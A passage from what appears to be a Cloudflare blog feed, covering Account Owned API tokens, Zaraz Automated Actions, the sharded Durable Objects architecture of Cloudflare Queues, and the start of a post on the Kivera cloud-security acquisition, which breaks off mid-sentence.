          </figure><p>3. <b>Anywhere you’ve created “Service Users”:</b> “Service Users”, or any identity that is meant to allow multiple people to access Cloudflare, are an active threat surface. They are generally highly privileged, and require additional controls (vaulting, password rotation, monitoring) to ensure non-repudiation and appropriate use. If these operations solely require API access, consolidating that access into an Account Owned Token is safe.</p>
    <div>
      <h3>Why/where should I use User Owned Tokens?</h3>
      <a href="#why-where-should-i-use-user-owned-tokens">
        
      </a>
    </div>
    <p>There are a few scenarios/situations where you should continue to use User Owned Tokens:</p><ol><li><p><b>Where programmatic access is done by a single person at an external interface:</b> If a single user has an external interface using their own access privileges at Cloudflare, it still makes sense to use a personal token, so that information access can be traced back to them. (e.g. using a personal token in a data visualization tool that pulls logs from Cloudflare)</p></li><li><p><a href="https://developers.cloudflare.com/api/operations/user-user-details"><b><u>User level operations</u></b></a><b>:</b> Any operations that operate on your own user (e.g. email changes, password changes, user preferences) still require a user level token.</p></li><li><p><b>Where you want to control resources over multiple accounts with the same credential:</b> As of November 2024, Account Owned Tokens are scoped to a single account. In 2025, we want to ensure that we can create cross-account credentials, anywhere that multiple accounts have to be called in the same set of operations should still rely on API Tokens owned by a user.</p></li><li><p><b>Where we currently do not support a given endpoint:</b> We are currently in the process of working through a <a href="https://developers.cloudflare.com/fundamentals/api/get-started/account-owned-tokens/"><u>list of our services</u></a> to ensure that they all support Account Owned Tokens. When interacting with any of these services that are not supported programmatically, please continue to use User Owned Tokens.</p></li><li><p><b>Where you need to do token management programmatically:</b> If you are in an organization that needs to create and delete large numbers of tokens programmatically, please continue to use User Owned Tokens. In late 2024, watch for the “Create Additional Tokens” template on the Account Owned Tokens Page. This template and associated created token will allow for the management of additional tokens.</p></li></ol>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4BGL99WFnh4oOgTFhRY5N3/26bca9fa8851729d4128c2836db62c3c/image6.png" />
          </figure>
    <div>
      <h3>What does this mean for my existing tokens and programmatic access moving forward?</h3>
      <a href="#what-does-this-mean-for-my-existing-tokens-and-programmatic-access-moving-forward">
        
      </a>
    </div>
    <p>We do not plan to decommission User Owned Tokens, as they still have a place in our overall access model and are handy for ensuring user-centric workflows can be implemented.</p><p>As of November 2024, we’re still working to ensure that ALL of our endpoints work with Account Owned Tokens, and we expect to deliver additional token management improvements continuously, with an expected end date of Q3 2025 to cover all endpoints.</p><p>A list of services that support, and do not support, Account Owned Tokens can be found in our <a href="https://developers.cloudflare.com/fundamentals/api/get-started/account-owned-tokens/"><u>documentation.</u></a></p>
    <div>
      <h3>What’s next?</h3>
      <a href="#whats-next">
        
      </a>
    </div>
    <p>If Account Owned Tokens could provide value to your or your organization, documentation is available <a href="https://developers.cloudflare.com/fundamentals/api/get-started/account-owned-tokens/"><u>here</u></a>, and you can give them a try today from the “API Tokens” menu in your dashboard.</p>
    <div>
      <h2>Zaraz Automated Actions makes adding tools to your website a breeze</h2>
      <a href="#zaraz-automated-actions-makes-adding-tools-to-your-website-a-breeze">
        
      </a>
    </div>
    
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5DkxlchIDUZbQ15x0H0usK/eb656617c1c83805bda98c7dfe896bda/image2.png" />
          </figure><p><a href="https://www.cloudflare.com/en-gb/application-services/products/zaraz/"><u>Cloudflare Zaraz</u></a> is a tool designed to manage and optimize third-party tools like analytics, marketing tags, or social media scripts on websites. By loading these third-party services through Cloudflare’s network, Zaraz improves website performance, security, and privacy. It ensures that these external scripts don't slow down page loading times or expose sensitive user data, as it handles them efficiently through Cloudflare's global network, reducing latency and improving the user experience.</p><p>Automated Actions are a new product feature that allow users to easily setup page views, custom events, and e-commerce tracking without going through the tedious process of manually setting up triggers and actions.</p>
    <div>
      <h3>Why we built Automated Actions</h3>
      <a href="#why-we-built-automated-actions">
        
      </a>
    </div>
    <p>An action in Zaraz is a way to tell a third party tool that a user interaction or event has occurred when certain conditions, defined by <a href="https://developers.cloudflare.com/zaraz/custom-actions/create-trigger/"><u>triggers</u></a>, are met. You create actions from within the tools page, associating them with specific tools and triggers.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6a0xBA0uG55z4mhVkN0aYl/10101523491c68e4f2eec022737d15d4/image12.png" />
          </figure><p>Setting up a tool in Zaraz has always involved a few steps: <a href="https://developers.cloudflare.com/zaraz/custom-actions/create-trigger/"><u>configuring a trigger</u></a>, <a href="https://developers.cloudflare.com/zaraz/custom-actions/create-action/"><u>linking it to a tool action</u></a> and finally calling <a href="https://developers.cloudflare.com/zaraz/web-api/track/"><code><u>zaraz.track()</u></code></a>. This process allowed advanced configurations with complex rules, and while it was powerful, it occasionally left users confused — why isn’t calling <code>zaraz.track()</code> enough? We heard your feedback, and we’re excited to introduce <b>Zaraz Automated Actions</b>, a feature designed to make Zaraz easier to use by reducing the amount of work needed to configure a tool.</p><p>With Zaraz Automated Actions, you can now automate sending data to your third-party tools without the need to create a manual configuration. Inspired by the simplicity of <a href="https://developers.cloudflare.com/zaraz/web-api/ecommerce/"><code><u>zaraz.ecommerce()</u></code></a>, we’ve extended this ease to all Zaraz events, removing the need for manual trigger and action setup. For example, calling <code>zaraz.track(‘myEvent’)</code> will send your event to the tool without the need to configure any triggers or actions.</p>
    <div>
      <h3>Getting started with Automated Actions</h3>
      <a href="#getting-started-with-automated-actions">
        
      </a>
    </div>
    <p>When adding a new tool in Zaraz, you’ll now see an additional step where you can choose one of three Automated Actions: <b>pageviews</b>, <b>all other events</b>, or <b>ecommerce</b>. These options allow you to specify what kind of events you want to automate for that tool.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1LRtb8XpSukCAgmK7uIA5Y/ab11ae9b58f474d08893b496a0eea764/image7.png" />
          </figure><ul><li><p><b>Pageviews</b>: Automatically sends data to the tool whenever someone visits a page on your site, without any manual configuration.</p></li><li><p><b>All other events</b>: Sends all custom events triggered using zaraz.track() to the selected tool, making it easy to automate tracking of user interactions.</p></li><li><p><b>Ecommerce</b>: Automatically sends all e-commerce events triggered via zaraz.ecommerce() to the tool, streamlining your sales and transaction tracking.</p></li></ul><p>These Automated Actions are also available for all your existing tools, which can be toggled on or off from the tool detail page in your Zaraz dashboard. This flexibility allows you to fine-tune which actions are automated based on your needs.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/xy1tIfYTfOo7p2IUeCS5d/42b26d6cfc4c05d8adc67edfc38ac34c/image10.png" />
          </figure>
    <div>
      <h3>Custom actions for tools without Automated Action support</h3>
      <a href="#custom-actions-for-tools-without-automated-action-support">
        
      </a>
    </div>
    <p>Some tools do not support automated actions because the tool itself does not support page view, custom, or e-commerce events. For such tools you can still create your own custom actions, just like before. Custom actions allow you to configure specific events to send data to your tools based on unique triggers. The process remains the same, and you can follow the detailed steps outlined in our<a href="https://developers.cloudflare.com/zaraz/get-started/create-actions/"> <u>Create Actions guide</u></a>. Remember to set up your trigger first, or choose an existing one, before configuring the action.</p>
    <div>
      <h4>Automatically enrich your payload</h4>
      <a href="#automatically-enrich-your-payload">
        
      </a>
    </div>
    <p>When creating a custom action, it is now easier to send Event Properties using the <b>Include Event Properties field.</b> When this is toggled on, you can automatically send client-specific data with each action, such as user behavior or interaction details. For example, to send an <code>userID</code> property when sending a <code>click</code> event you can do something like this: <code>zaraz.track(‘click’, { userID: “foo” })</code>.</p><p>Additionally, you can enable the <b>Include System Properties</b> option to send system-level information, such as browser, operating system, and more. In your action settings click on “Add Field”, pick the “Include System Properties”, click on confirm and then toggle the field on. </p><p>For a full list of system properties, visit our<a href="https://developers.cloudflare.com/zaraz/reference/context/"> <u>System Properties reference guide</u></a>. These options give you greater flexibility and control over the data you send with custom actions.</p><p>These two fields replace the now deprecated “Enrich Payload” dropdown field.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/73nCsNmeG58p6n0ylxMV8E/5cb87b516aaceb38319f9175dc7ccbf3/image5.png" />
          </figure><p>Zaraz Automated Actions marks a significant step forward in simplifying how you manage events across your tools. By automating common actions like page views, e-commerce events, and custom tracking, you can save time and reduce the complexity of manual configurations. Whether you’re leveraging Automated Actions for speed or creating custom actions for more tailored use cases, Zaraz offers the flexibility to fit your workflow. </p><p>We’re excited to see how you use this feature. Please don’t hesitate to reach out to us on Cloudflare <a href="https://discord.gg/2TRr6nSxdd"><u>Zaraz’s Discord Channel</u></a> — we’re always there fixing issues, listening to feedback, and announcing exciting product updates.</p>
    <div>
      <h2>Never miss an update</h2>
      <a href="#never-miss-an-update">
        
      </a>
    </div>
    <p>We’ll continue to share roundup blog posts as we continue to build and innovate. Be sure to follow along on the <a href="https://blog.cloudflare.com/"><u>Cloudflare Blog</u></a> for the latest news and updates.</p> ]]></content:encoded>
            <category><![CDATA[Identity]]></category>
            <category><![CDATA[Security]]></category>
            <category><![CDATA[Developers]]></category>
            <category><![CDATA[Product News]]></category>
            <category><![CDATA[Zaraz]]></category>
            <category><![CDATA[Analytics]]></category>
            <category><![CDATA[Managed Components]]></category>
            <guid isPermaLink="false">5BHU4q5GpzBQ1OLQoUvkKN</guid>
            <dc:creator>Joseph So</dc:creator>
            <dc:creator>Omar Mohammad</dc:creator>
            <dc:creator>Yo'av Moshe</dc:creator>
        </item>
        <item>
            <title><![CDATA[Durable Objects aren't just durable, they're fast: a 10x speedup for Cloudflare Queues]]></title>
            <link>https://blog.cloudflare.com/how-we-built-cloudflare-queues/</link>
            <pubDate>Thu, 24 Oct 2024 13:00:00 GMT</pubDate>
            <description><![CDATA[ Learn how we built Cloudflare Queues using our own Developer Platform and how it evolved to a geographically-distributed, horizontally-scalable architecture built on Durable Objects. Our new architecture supports over 10x more throughput and over 3x lower latency compared to the previous version. ]]></description>
            <content:encoded><![CDATA[ <p></p><p><a href="https://www.cloudflare.com/developer-platform/products/cloudflare-queues/"><u>Cloudflare Queues</u></a> let a developer decouple their Workers into event-driven services. Producer Workers write events to a Queue, and consumer Workers are invoked to take actions on the events. For example, you can use a Queue to decouple an e-commerce website from a service which sends purchase confirmation emails to users. During 2024’s Birthday Week, we <a href="https://blog.cloudflare.com/builder-day-2024-announcements?_gl=1*18s1fwl*_gcl_au*MTgyNDA5NjE5OC4xNzI0MjgzMTQ0*_ga*OTgwZmE0YWUtZWJjMS00NmYxLTllM2QtM2RmY2I4ZjAwNzZk*_ga_SQCRB0TXZW*MTcyODkyOTU2OS4xNi4xLjE3Mjg5Mjk1NzcuNTIuMC4w/#queues-is-ga"><u>announced that Cloudflare Queues is now Generally Available</u></a>, with significant performance improvements that enable larger workloads. To accomplish this, we switched to a new architecture for Queues that enabled the following improvements:</p><ul><li><p>Median latency for sending messages has dropped from ~200ms to ~60ms</p></li><li><p>Maximum throughput for each Queue has increased over 10x, from 400 to 5000 messages per second</p></li><li><p>Maximum Consumer concurrency for each Queue has increased from 20 to 250 concurrent invocations</p></li></ul>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5PvIsHfLwwIkp2LXVUDhmG/99f286f2f89d10b2a7e359d8d66f6dba/image5.png" />
          </figure><p><sup><i>Median latency drops from ~200ms to ~60ms as Queues are migrated to the new architecture</i></sup></p><p>In this blog post, we'll share details about how we built Queues using Durable Objects and the Cloudflare Developer Platform, and how we migrated from an initial Beta architecture to a geographically-distributed, horizontally-scalable architecture for General Availability.</p>
    <div>
      <h3>v1 Beta architecture</h3>
      <a href="#v1-beta-architecture">
        
      </a>
    </div>
    <p>When initially designing Cloudflare Queues, we decided to build something simple that we could get into users' hands quickly. First, we considered leveraging an off-the-shelf messaging system such as Kafka or Pulsar. However, we decided that it would be too challenging to operate these systems at scale with the large number of isolated tenants that we wanted to support.</p><p>Instead of investing in new infrastructure, we decided to build on top of one of Cloudflare's existing developer platform building blocks: <b>Durable Objects.</b> <a href="https://www.cloudflare.com/developer-platform/durable-objects/"><u>Durable Objects</u></a> are a simple, yet powerful building block for coordination and storage in a distributed system. In our initial <i>v1 </i>architecture, each Queue was implemented using a single Durable Object. As shown below, clients would send messages to a Worker running in their region, which would be forwarded to the single Durable Object hosted in the WNAM (Western North America) region. We used a single Durable Object for simplicity, and hosted it in WNAM for proximity to our centralized configuration API service.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/yxj5Gut3usYa0mFbRddXU/881f5905f789bc2f910ee1b2dcadac92/image1.png" />
          </figure><p>One of a Queue's main responsibilities is to accept and store incoming messages. Sending a message to a <i>v1</i> Queue used the following flow:</p><ul><li><p>A client sends a POST request containing the message body to the Queues API at <code>/accounts/:accountID/queues/:queueID/messages</code></p></li><li><p>The request is handled by an instance of the <b>Queue Broker Worker</b> in a Cloudflare data center running near the client.</p></li><li><p>The Worker performs authentication, and then uses Durable Objects <code>idFromName</code> API to route the request to the <b>Queue Durable Object</b> for the given <code>queueID</code></p></li><li><p>The Queue Durable Object persists the message to storage before returning a <i>success </i>back to the client.</p></li></ul><p>Durable Objects handled most of the heavy-lifting here: we did not need to set up any new servers, storage, or service discovery infrastructure. To route requests, we simply provided a <code>queueID</code> and the platform handled the rest. To store messages, we used the Durable Object storage API to <code>put</code> each message, and the platform handled reliably storing the data redundantly.</p>
    <div>
      <h3>Consuming messages</h3>
      <a href="#consuming-messages">
        
      </a>
    </div>
    <p>The other main responsibility of a Queue is to deliver messages to a Consumer. Delivering messages in a v1 Queue used the following process:</p><ul><li><p>Each Queue Durable Object maintained an <b>alarm </b>that was always set when there were undelivered messages in storage. The alarm guaranteed that the Durable Object would reliably wake up to deliver any messages in storage, even in the presence of failures. The alarm time was configured to fire after the user's selected <i>max wait time</i><b><i>, </i></b>if only a partial batch of messages was available. Whenever one or more full batches were available in storage, the alarm was scheduled to fire immediately.</p></li><li><p>The alarm would wake the Durable Object, which continually looked for batches of messages in storage to deliver.</p></li><li><p>Each batch of messages was sent to a "Dispatcher Worker" that used <a href="https://developers.cloudflare.com/cloudflare-for-platforms/workers-for-platforms/"><u>Workers for Platforms</u></a> <a href="https://developers.cloudflare.com/cloudflare-for-platforms/workers-for-platforms/reference/how-workers-for-platforms-works/#dynamic-dispatch-worker"><i><u>dynamic dispatch</u></i></a> to pass the messages to the <code>queue()</code> function defined in a user's Consumer Worker</p></li></ul>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4vAM17x3nN49JBMGNTblPp/6af391950df5f0fbc14faeccb351e38c/image4.png" />
          </figure><p>This v1 architecture let us flesh out the initial version of the Queues Beta product and onboard users quickly. Using Durable Objects allowed us to focus on building application logic, instead of complex low-level systems challenges such as global routing and guaranteed durability for storage. Using a separate Durable Object for each Queue allowed us to host an essentially unlimited number of Queues, and provided isolation between them.</p><p>However, using <i>only</i> one Durable Object per queue had some significant limitations:</p><ul><li><p><b>Latency: </b>we created all of our v1 Queue Durable Objects in Western North America. Messages sent from distant regions incurred significant latency when traversing the globe.</p></li><li><p><b>Throughput: </b>A single Durable Object is not scalable: it is single-threaded and has a fixed capacity for how many requests per second it can process. This is where the previous 400 messages per second limit came from.</p></li><li><p><b>Consumer Concurrency: </b>Due to <a href="https://developers.cloudflare.com/workers/platform/limits/#simultaneous-open-connections"><u>concurrent subrequest limits</u></a>, a single Durable Object was limited in how many concurrent subrequests it could make to our Dispatcher Worker. This limited the number of <code>queue()</code> handler invocations that it could run simultaneously.</p></li></ul><p>To solve these issues, we created a new v2 architecture that horizontally scales across <b>multiple</b> Durable Objects to implement each single high-performance Queue.</p>
    <div>
      <h3>v2 Architecture</h3>
      <a href="#v2-architecture">
        
      </a>
    </div>
    <p>In the new v2 architecture for Queues, each Queue is implemented using multiple Durable Objects, instead of just one. Instead of a single region, we place <i>Storage Shard </i>Durable Objects in <a href="https://developers.cloudflare.com/durable-objects/reference/data-location/#supported-locations-1"><u>all available regions</u></a> to enable lower latency. Within each region, we create multiple Storage Shards and load balance incoming requests amongst them. Just like that, we’ve multiplied message throughput.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2SJTb2UO8tKGrh26ixwLrA/7272e4eaf6f7e85f086a5ae08670387e/image2.png" />
          </figure><p>Sending a message to a v2 Queue uses the following flow:</p><ul><li><p>A client sends a POST request containing the message body to the Queues API at <code>/accounts/:accountID/queues/:queueID/messages</code></p></li><li><p>The request is handled by an instance of the <b>Queue Broker Worker</b> running in a Cloudflare data center near the client.</p></li><li><p>The Worker:</p><ul><li><p>Performs authentication</p></li><li><p>Reads from Workers KV to obtain a <i>Shard Map</i> that lists available storage shards for the given <code>region</code> and <code>queueID</code></p></li><li><p>Picks one of the region's Storage Shards at random, and uses Durable Objects <code>idFromName</code> API to route the request to the chosen shard</p></li></ul></li><li><p>The Storage Shard persists the message to storage before returning a <i>success </i>back to the client.</p></li></ul><p>In this v2 architecture, messages are stored in the closest available Durable Object storage cluster near the user, greatly reducing latency since messages don't need to be shipped all the way to WNAM. Using multiple shards within each region removes the bottleneck of a single Durable Object, and allows us to scale each Queue horizontally to accept even more messages per second. <a href="https://blog.cloudflare.com/tag/cloudflare-workers-kv/"><u>Workers KV</u></a> acts as a fast metadata store: our Worker can quickly look up the shard map to perform load balancing across shards.</p><p>To improve the <i>Consumer</i> side of v2 Queues, we used a similar "scale out" approach. A single Durable Object can only perform a limited number of concurrent subrequests. In v1 Queues, this limited the number of concurrent subrequests we could make to our Dispatcher Worker. To work around this, we created a new <i>Consumer Shard</i> Durable Object class that we can scale horizontally, enabling us to execute many more concurrent instances of our users' <code>queue()</code> handlers.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2ujodUVBegDcWXi6DYJR41/5f31ba4da387df82613a496ff311f65f/image3.png" />
          </figure><p>Consumer Durable Objects in v2 Queues use the following approach:</p><ul><li><p>Each Consumer maintains an alarm that guarantees it will wake up to process any pending messages. <i>v2 </i>Consumers are notified by the Queue's <i>Coordinator </i>(introduced below) when there are messages ready for consumption. Upon notification, the Consumer sets an alarm to go off immediately.</p></li><li><p>The Consumer looks at the shard map, which contains information about the storage shards that exist for the Queue, including the number of available messages on each shard.</p></li><li><p>The Consumer picks a random storage shard with available messages, and asks for a batch.</p></li><li><p>The Consumer sends the batch to the Dispatcher Worker, just like for v1 Queues.</p></li><li><p>After processing the messages, the Consumer sends another request to the Storage Shard to either "acknowledge" or "retry" the messages.</p></li></ul><p>This scale-out approach enabled us to work around the subrequest limits of a single Durable Object, and increase the maximum supported concurrency level of a Queue from 20 to 250. </p>
    <div>
      <h3>The Coordinator and “Control Plane”</h3>
      <a href="#the-coordinator-and-control-plane">
        
      </a>
    </div>
    <p>So far, we have primarily discussed the "Data Plane" of a v2 Queue: how messages are load balanced amongst Storage Shards, and how Consumer Shards read and deliver messages. The other main piece of a v2 Queue is the "Control Plane", which handles creating and managing all the individual Durable Objects in the system. In our v2 architecture, each Queue has a single <i>Coordinator</i> Durable Object that acts as the brain of the Queue. Requests to create a Queue, or change its settings, are sent to the Queue's Coordinator.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/7lYJs23oJ8ibtGgbuOk9JN/7ffa8073a4391602b67a0c6e134975bc/image7.png" />
          </figure><p>The Coordinator maintains a <i>Shard Map</i> for the Queue, which includes metadata about all the Durable Objects in the Queue (including their region, number of available messages, current estimated load, etc.). The Coordinator periodically writes a fresh copy of the Shard Map into Workers KV, as pictured in step 1 of the diagram. Placing the shard map into Workers KV ensures that it is globally cached and available for our Worker to read quickly, so that it can pick a shard to accept the message.</p><p>Every shard in the system periodically sends a heartbeat to the Coordinator as shown in steps 2 and 3 of the diagram. Both Storage Shards and Consumer Shards send heartbeats, including information like the number of messages stored locally, and the current load (requests per second) that the shard is handling. The Coordinator uses this information to perform <b><i>autoscaling. </i></b>When it detects that the shards in a particular region are overloaded, it creates additional shards in the region, and adds them to the shard map in Workers KV. Our Worker sees the updated shard map and naturally load balances messages across the freshly added shards. Similarly, the Coordinator looks at the backlog of available messages in the Queue, and decides to add more Consumer shards to increase Consumer throughput when the backlog is growing. Consumer Shards pull messages from Storage Shards for processing as shown in step 4 of the diagram.</p><p>Switching to a new scalable architecture allowed us to meet our performance goals and take Queues to GA. As a recap, this new architecture delivered these significant improvements:</p><ul><li><p>P50 latency for writing to a Queue has dropped from ~200ms to ~60ms.</p></li><li><p>Maximum throughput for a Queue has increased from 400 to 5000 messages per second.</p></li><li><p>Maximum consumer concurrency has increased from 20 to 250 invocations.	</p></li></ul>
    <div>
      <h3>What's next for Queues</h3>
      <a href="#whats-next-for-queues">
        
      </a>
    </div>
    <ul><li><p>We plan on leveraging the performance improvements in the new <a href="https://developers.cloudflare.com/durable-objects/"><u>beta version of Durable Objects</u></a> which use SQLite to continue to improve throughput/latency in Queues.</p></li><li><p>We will soon be adding message management features to Queues so that you can take actions to purge messages in a queue, pause consumption of messages, or “redrive”/move messages from one queue to another (for example messages that have been sent to a Dead Letter Queue could be “redriven” or moved back to the original queue).</p></li><li><p>Work to make Queues the "event hub" for the Cloudflare Developer Platform:</p><ul><li><p>Create a low-friction way for events emitted from other Cloudflare services with event schemas to be sent to Queues.</p></li><li><p>Build multi-Consumer support for Queues so that Queues are no longer limited to one Consumer per queue.</p></li></ul></li></ul><p>To start using Queues, head over to our <a href="https://developers.cloudflare.com/queues/get-started/"><u>Getting Started</u></a> guide. </p><p>Do distributed systems like Cloudflare Queues and Durable Objects interest you? Would you like to help build them at Cloudflare? <a href="https://boards.greenhouse.io/embed/job_app?token=5390243&amp;gh_src=b2e516a81us"><u>We're Hiring!</u></a></p> ]]></content:encoded>
            <category><![CDATA[Product News]]></category>
            <category><![CDATA[Cloudflare Queues]]></category>
            <category><![CDATA[Cloudflare Workers]]></category>
            <category><![CDATA[Durable Objects]]></category>
            <category><![CDATA[Developers]]></category>
            <category><![CDATA[Developer Platform]]></category>
            <guid isPermaLink="false">41vXJNWrB0YHsKqSz6SGDS</guid>
            <dc:creator>Josh Wheeler</dc:creator>
            <dc:creator>Siddhant Sinha</dc:creator>
            <dc:creator>Todd Mantell</dc:creator>
            <dc:creator>Pranshu Maheshwari</dc:creator>
        </item>
        <item>
            <title><![CDATA[Cloudflare acquires Kivera to add simple, preventive cloud security to Cloudflare One ]]></title>
            <link>https://blog.cloudflare.com/cloudflare-acquires-kivera/</link>
            <pubDate>Tue, 08 Oct 2024 13:00:00 GMT</pubDate>
            <description><![CDATA[ The acquisition of Kivera broadens the scope of Cloudflare’s SASE platform beyond just apps, incorporating increased cloud security through proactive configuration management of cloud services.  ]]></description>
            <content:encoded><![CDATA[ <p>We’re excited to announce that <a href="https://www.kivera.io/"><u>Kivera</u></a>, a cloud security, data protection, and compliance company, has joined Cloudflare. This acquisition extends our SASE portfolio to incorporate inline cloud app controls, empowering <a href="https://www.cloudflare.com/zero-trust/"><u>Cloudflare One</u></a> customers with preventative security controls for all their cloud services.</p><p>In today’s digital landscape, cloud services and SaaS (software as a service) apps have become indispensable for the daily operation of organizations. At the same time, the amount of data flowing between organizations and their cloud providers has ballooned, increasing the chances of data leakage, compliance issues, and worse, opportunities for attackers. Additionally, many companies — especially at enterprise scale — are working directly with multiple cloud providers for flexibility based on the strengths, resiliency against outages or errors, and cost efficiencies of different clouds. </p><p>Security teams that rely on <a href="https://www.cloudflare.com/learning/cloud/what-is-cspm/"><u>Cloud Security Posture Management (CSPM)</u></a> or similar tools for monitoring cloud configurations and permissions and Infrastructure as code (IaC) scanning are falling short due to detecting issues only after misconfigurations occur with an overwhelming volume of alerts. The combination of Kivera and Cloudflare One puts preventive controls directly into the deployment process, or ‘inline’, blocking errors before they happen. This offers a proactive approach essential to protecting cloud infrastructure from evolving cyber threats, <a href="https://www.cloudflare.com/learning/cloud/what-is-dspm/">maintaining data security</a>, and accelerating compliance. </p>
    <div>
      <h2>An early warning system for cloud security risks </h2>
      <a href="#an-early-warning-system-for-cloud-security-risks">
        
      </a>
    </div>
    <p>In a significant leap forward in cloud security, the combination of Kivera’s technology and Cloudflare One adds preventive, inline controls to enforce secure configurations for cloud resources. By inspecting cloud API traffic, these new capabilities equip organizations with enhanced visibility and granular controls, allowing for a proactive approach in mitigating risks, managing cloud security posture, and embracing a streamlined DevOps process when deploying cloud infrastructure.</p><p>Kivera will add the following capabilities to Cloudflare’s <a href="https://www.cloudflare.com/learning/access-management/what-is-sase/"><u>SASE</u></a> platform:</p><ul><li><p><b>One-click security:</b> Customers benefit from immediate prevention of the most common cloud breaches caused by misconfigurations, such as accidentally allowing public access or policy inconsistencies.</p></li><li><p><b>Enforced cloud tenant control:</b> Companies can easily draw boundaries around their cloud resources and tenants to ensure that sensitive data stays within their organization. </p></li><li><p><b>Prevent data exfiltration:</b> Easily set rules to prevent data being sent to unauthorized locations.</p></li><li><p><b>Reduce ‘shadow’ cloud infrastructure:</b> Ensure that every interaction between a customer and their cloud provider is in line with preset standards. </p></li><li><p><b>Streamline cloud security compliance:</b> Customers can automatically assess and enforce compliance against the most common regulatory frameworks.</p></li><li><p><b>Flexible DevOps model:</b> Enforce bespoke controls independent of public cloud setup and deployment tools, minimizing the layers of lock-in between an organization and a cloud provider.</p></li><li><p><b>Complementing other cloud security tools:</b> Create a first line of defense for cloud deployment errors, reducing the volume of alerts for customers also using CSPM tools or <a href="https://www.cloudflare.com/learning/cloud/cnapp/">Cloud Native Application Protection Platforms (CNAPPs)</a>. </p></li></ul>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/7nALx5Qv8FBYxn1R6RkUvX/1b3dddb60d9d85142a9fda82d2eee381/BLOG-2592_2.png" />
          </figure><p><sub><i>An intelligent proxy that uses a policy-based approach to 
enforce secure configuration of cloud resources.</i></sub></p>
    <div>
      <h2>Better together with Cloudflare One</h2>
      <a href="#better-together-with-cloudflare-one">
        
      </a>
    </div>
    <p>As a SASE platform, Cloudflare One ensures safe access and provides data controls for cloud and SaaS apps. This integration broadens the scope of Cloudflare’s SASE platform beyond user-facing applications to incorporate increased cloud security through proactive configuration management of infrastructure services, beyond what CSPM and <a href="https://www.cloudflare.com/learning/access-management/what-is-a-casb/"><u>CASB</u></a> solutions provide. With the addition of Kivera to Cloudflare One, customers now have a unified platform for all their inline protections, including cloud control, access management, and threat and data protection. All of these features are available with single-pass inspection, which is <a href="https://blog.cloudflare.com/network-performance-update-cio-edition/?_ga=2.241337794.1947644748.1710771073-1224524116.1709647459"><u>50% faster</u></a> than <a href="https://www.cloudflare.com/learning/access-management/what-is-a-secure-web-gateway/"><u>Secure Web Gateway (SWG)</u></a> alternatives.  </p><p>With the earlier <a href="https://blog.cloudflare.com/cloudflare-acquires-bastionzero/"><u>acquisition of BastionZero</u></a>, a Zero Trust infrastructure access company, Cloudflare One expanded the scope of its VPN replacement solution to cover infrastructure resources as easily as it does apps and networks. Together Kivera and BastionZero enable centralized security management across hybrid IT environments, and provide a modern DevOps-friendly way to help enterprises connect and protect their hybrid infrastructure with Zero Trust best practices.</p><p>Beyond its SASE capabilities, Cloudflare One is integral to <a href="https://www.cloudflare.com/connectivity-cloud/"><u>Cloudflare’s connectivity cloud</u></a>, enabling organizations to consolidate IT security tools on a single platform. This simplifies secure access to resources, from developer privileged access to technical infrastructure and expanding cloud services. As <a href="https://www.cloudflare.com/lp/forrester-wave-sse-2024/"><u>Forrester echoes</u></a>, “Cloudflare is a good choice for enterprise prospects seeking a high-performance, low-maintenance, DevOps-oriented solution.”</p>
    <div>
      <h2>The growing threat of cloud misconfigurations</h2>
      <a href="#the-growing-threat-of-cloud-misconfigurations">
        
      </a>
    </div>
    <p>The cloud has become a prime target for cyberattacks. According to the <a href="https://www.crowdstrike.com/resources/reports/crowdstrike-2023-cloud-risk-report-executive-summary/"><u>2023 Cloud Risk Report</u></a>, CrowdStrike observed a 95% increase in cloud exploitation from 2021 to 2022, with a staggering 288% jump in cases involving threat actors directly targeting the cloud.</p><p>Misconfigurations in cloud infrastructure settings, such as improperly set security parameters and default access controls, provide adversaries with an easy path to infiltrate the cloud. According to the <a href="https://cpl.thalesgroup.com/sites/default/files/content/cloud-security/2024/2024-thales-cloud-security-study-global-edition.pdf"><u>2023 Thales Global Cloud Security Study</u></a>, which surveyed nearly 3,000 IT and security professionals from 18 countries, 44% of respondents reported experiencing a data breach, with misconfigurations and human error identified as the leading cause, accounting for 31% of the incidents.</p><p>Further, according to Gartner<sup>Ⓡ</sup>, “Through 2027, 99% of records compromised in cloud environments will be the result of user misconfigurations and account compromise, not the result of an issue with the cloud provider.”<sup>1</sup></p><p>Several factors contribute to the rise of cloud misconfigurations:</p><ul><li><p><b>Rapid adoption of cloud services:</b> Leaders are often driven by the scalability, cost-efficiency, and ability to support remote work and real-time collaboration that cloud services offer. These factors enable rapid adoption of cloud services which can lead to unintentional misconfigurations as IT teams struggle to keep up with the pace and complexity of these services. </p></li><li><p><b>Complexity of cloud environments:</b> Cloud infrastructure can be highly complex with multiple services and configurations to manage. For example, <a href="https://public.docs.kivera.io/docs/access-analyzer"><u>AWS alone offers</u></a> 373 services with 15,617 actions and 140,000+ parameters, making it challenging for IT teams to manage settings accurately. </p></li><li><p><b>Decentralized management:</b> In large organizations, cloud infrastructure resources are often managed by multiple teams or departments. Without centralized oversight, inconsistent security policies and configurations can arise, increasing the risk of misconfigurations.</p></li><li><p><b>Continuous Integration and Continuous Deployment (CI/CD):</b> <a href="https://www.cloudflare.com/learning/serverless/glossary/what-is-ci-cd/">CI/CD pipelines</a> promote the ability to rapidly deploy, change and frequently update infrastructure. With this velocity comes the increased risk of misconfigurations when changes are not properly managed and reviewed.</p></li><li><p><b>Insufficient training and awareness:</b> Employees may lack the cross-functional skills needed for cloud security, such as understanding networks, identity, and service configurations. This knowledge gap can lead to mistakes and increases the risk of misconfigurations that 